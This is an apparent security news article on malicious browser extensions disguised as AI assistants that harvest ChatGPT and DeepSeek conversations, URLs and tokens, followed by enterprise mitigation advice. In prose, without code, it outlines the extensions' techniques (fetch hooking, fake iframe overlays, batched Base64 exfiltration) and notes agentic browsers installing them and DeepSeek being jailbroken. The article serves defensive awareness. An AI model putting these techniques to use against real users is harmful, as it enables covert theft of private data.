Malicious AI Extensions Exfiltrate Sensitive Data from LLM Chat Services

The digital frontier is constantly evolving, and with the rapid proliferation of Artificial Intelligence, so too are the tactics of malicious actors. A recent, alarming report from Microsoft in March 2026 brought to light a significant cybersecurity threat: the widespread distribution of malicious AI extensions disguised as legitimate AI assistants. These insidious add-ons infiltrated over 20,000 enterprise environments, amassing approximately 900,000 installs and quietly exfiltrating sensitive data from Large Language Model (LLM) chat services such as ChatGPT and DeepSeek. This incident serves as a stark warning, exposing critical vulnerabilities in organizational governance surrounding browser extensions and the daily usage of AI tools.

The Trojan Horse in Your Browser: Anatomy of Malicious AI Extensions

The malicious campaign leveraged a potent combination of user trust and the burgeoning demand for AI-driven productivity tools. Threat actors meticulously crafted these extensions to mimic legitimate AI assistants, employing convincing branding, user interfaces, and even permission prompts to deceive users.

Deceptive Distribution and Widespread Reach

The primary distribution channel for these malicious AI extensions was the official Chrome Web Store. By presenting themselves as genuine productivity enhancers, some even managed to acquire a “Featured” badge, further cementing their deceptive credibility. The Chromium architecture, shared by popular browsers like Google Chrome and Microsoft Edge, allowed a single malicious listing to compromise users across both platforms, magnifying the campaign’s reach. In some cases, “agentic browsers” were observed automatically downloading these extensions due to their convincing descriptions, bypassing explicit user approval.

Once installed, these extensions operated subtly, turning a seemingly trusted productivity tool into a persistent data collection mechanism.

Sophisticated Data Exfiltration Techniques

The core objective of these malicious AI extensions was long-term, persistent data exfiltration. The types of data harvested were extensive and highly sensitive:

• LLM Chat Content: Full chat conversations, including both user prompts and AI responses, from platforms like ChatGPT and DeepSeek. This could expose proprietary code, internal workflows, strategic discussions, and other confidential corporate data.
• Browsing Telemetry: Nearly all visited URLs, including internal company sites and the context of navigation (e.g., previous and next pages).
• Authentication Tokens and Session Identifiers: Potential theft of these critical elements, increasing the risk of account takeover.
• Direct File Access: In a related campaign (MaliciousCorgi) targeting Microsoft VSCode extensions, threat actors were observed exfiltrating the entire contents of files as soon as they were opened, encoded in Base64 and sent to attacker-controlled servers.

The operational techniques demonstrated a high degree of stealth and persistence. The extensions relied on standard browser behavior, reloading automatically upon startup to maintain their presence. Furthermore, they employed evasive consent mechanisms: even if users initially declined data collection, subsequent updates to the extension were designed to re-enable telemetry by default, effectively continuing data harvesting without explicit user approval. Exfiltrated data was often staged locally in Base64-encoded JSON format before being transmitted in periodic batches via HTTPS POST requests to attacker-controlled command-and-control (C2) infrastructure, with exfiltration cycles observed every 30 minutes.

A crucial technical aspect involves the “Man-in-the-Prompt” attack method, identified by LayerX. Malicious extensions, even those with seemingly limited permissions, can inject content scripts into a webpage’s JavaScript runtime environment. This allows them to hook critical browser functions, such as `window.fetch`, to intercept outbound requests or directly read and write to the Document Object Model (DOM) of the page. This capability enables the extensions to manipulate user inputs, capture sensitive outputs, and even interact with chatbots in a hidden browser tab, subsequently deleting chat history to cover their tracks. Another observed technique involves creating a full-screen iframe pointing to an attacker-controlled domain, overlaid onto the legitimate page, to capture user interactions with a convincing, yet fake, AI chat interface.

The Broader Landscape: Browser Extension Security and AI Governance Gaps

This incident is not an isolated event but a stark illustration of a rapidly evolving threat landscape where browser extensions have become a prime target for cybercriminals.

Browser Extensions as a Supply Chain Attack Vector

The concept of “supply chain attacks” has expanded beyond traditional software to include browser extensions. Threat actors are increasingly purchasing legitimate, popular extensions from developers and then pushing malicious updates to the unsuspecting user base. The automatic update mechanisms, designed for security, are weaponized in this scenario, silently delivering malware to millions of users. These attacks exploit the inherent trust users place in tools installed from official marketplaces, making detection challenging as initial versions may be benign, with malicious code introduced later through updates.

The Shadow AI Problem and DeepSeek’s Unique Risks

The incident also highlights the prevalent “shadow AI” phenomenon, where employees use unapproved AI tools outside of organizational oversight. This creates significant blind spots for security teams, leading to data breaches, compliance violations, and intellectual property loss.

Compounding this is the specific case of DeepSeek, one of the LLMs targeted by these extensions. Beyond being an exfiltration target, DeepSeek itself has been flagged for numerous inherent security and privacy issues. Reports indicate that DeepSeek stores data on servers in China, raising concerns about data sovereignty and potential access by Chinese state-linked entities due to domestic laws. Security researchers have identified critical flaws such as hard-coded encryption keys, unencrypted transmission of user and device data, and publicly accessible databases exposing sensitive chat history and API secrets. Furthermore, DeepSeek has demonstrated vulnerabilities to “jailbreak” exploits, allowing it to bypass safety filters and generate disallowed or dangerous content, a concern exacerbated when combined with malicious extensions that can manipulate its input.

The “Last Mile” of Security

The browser has transformed into the “new security edge” for enterprises, as over 80% of work now occurs within it, facilitating access to SaaS applications and sensitive organizational data. Traditional network defenses often lack visibility into encrypted traffic within browser-based applications, leaving a critical “last mile” governance gap. This gap means that security teams struggle to monitor and control the exact moment sensitive corporate data is pasted into a chatbot or when a risky AI-powered browser extension is installed.

Fortifying the Enterprise: Mitigation and Proactive Governance Strategies

Addressing the threat of malicious AI extensions requires a multi-faceted approach, combining robust technical controls with comprehensive policy and educational initiatives.

Enhanced Browser Extension Management

Organizations must implement rigorous policies for browser extension usage. This includes:

• Inventory and Audit: Regularly inventory all installed browser extensions across the organization and conduct thorough audits of their permissions and activities. Tools like Microsoft Defender Vulnerability Management can assist in this.
• Principle of Least Privilege: Enforce the principle of least privilege for extensions, ensuring they only have access to the data and functionalities absolutely necessary for their intended purpose.
• Allow-listing/Block-listing: Implement strict allow-listing policies for approved extensions and block-list known malicious ones.
• Continuous Monitoring: Monitor network POST traffic for known malicious endpoints associated with data exfiltration.

Comprehensive AI Governance

The rapid adoption of generative AI necessitates a robust governance framework that extends beyond traditional IT security. Key practices include:

• Clear Policies and Procedures: Establish, monitor, and enforce clear organizational policies and procedures regarding the use of AI tools, including guidelines on what types of data can be shared.
• “Shadow AI” Discovery: Implement mechanisms such as network monitoring, SaaS log reviews, and employee surveys to identify and bring “shadow AI” usage under governance.
• Data Security and Compliance: Leverage data security solutions like Microsoft Purview to implement AI data security and compliance controls, especially for sensitive data used in browser-based AI chat applications.

Advanced Browser Security and Contextual Governance

Emerging solutions and practices are focusing on securing the browser as the new enterprise perimeter:

• Secure Enterprise Browsers: Investigate and adopt secure enterprise browsers or browser security platforms that are built with AI-specific controls. These tools offer deep visibility into browser-level interactions, allowing organizations to monitor prompt context, inspect extension permissions, and redact sensitive data in real-time without disrupting workflows.
• Contextual Governance: Implement contextual governance frameworks that limit the autonomy of AI agents and dynamically verify the identity of both the AI agent and the human user before high-stakes tasks or data transfers. This involves granular policies, such as blocking the pasting of sensitive source code into chatbots or preventing the installation of high-risk AI extensions.
• Employee Education: Crucially, educate employees about the risks associated with installing unverified browser extensions and sharing sensitive information with AI tools. Understanding the threat is the first line of defense.

The incident involving malicious AI extensions serves as a critical inflection point. It underscores the urgent need for organizations to proactively adapt their security postures to the complexities of the AI era. By treating the browser as a primary attack surface and implementing comprehensive governance around both extensions and AI tool usage, enterprises can better protect their sensitive data and maintain the integrity of their operations in this rapidly evolving digital landscape.